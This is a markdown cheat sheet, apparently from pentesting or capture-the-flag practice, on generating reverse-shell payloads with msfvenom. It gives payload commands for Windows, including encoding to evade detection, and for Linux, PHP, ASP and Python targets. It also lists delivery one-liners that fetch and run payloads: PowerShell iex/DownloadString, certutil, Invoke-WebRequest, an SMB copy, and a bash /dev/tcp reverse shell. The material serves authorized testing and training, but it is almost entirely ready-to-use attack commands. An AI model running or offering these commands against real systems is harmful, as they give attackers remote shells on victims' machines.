# msfvenom usage ``` msfvenom -p ``` * syntax ``` // ``` * stageless ``` linux/x86/shell_reverse_tcp ``` * staged ``` linux/x86/shell/reverse_tcp ``` ## Windows ### x64 Reverse Shell in exe format ``` msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST= LPORT= ``` ### x86 shikata_ga_nai ``` msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encode x86/shikata_ga_nai LHOST=10.9.7.123 LPORT=4446 -f exe -o shell.exe ``` ### Getting the shell on target * on attack machine, with shell.exe in cwd ``` python -m http.server ``` * on target machine execute this ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://:8000/shell-name.exe','shell-name.exe')" Start-Process "shell.exe" ``` or ``` powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port ``` or ``` powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'" ``` or on cmd.exe ```sh certutil -urlcache -split -f http://:/shell.exe ``` * Using SMB On attacker ```sh sudo python impacket/examples/smbserver.py dir . ``` on target ```sh copy \\\dir\shell.exe C:\shell.exe ``` ## Unix ### netcat reverse ```sh msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT= R msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o shell.elf ``` * Alternatively, not msfvenom ```sh bash -c "bash -i >& /dev/tcp// 0>&1" ``` ### Include into Python Exploit as hex ```sh msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b "\x00" -f py ``` ## PHP ```sh msfvenom -p php/reverse_shell LHOST= lPORT=4444 -f raw > reverse_shell.php ``` * Enclose raw file inside `` tags ## ASP ```sh msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -o rev_shell.asp ``` ## Python ```sh msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f python -o reverse_shell.python ```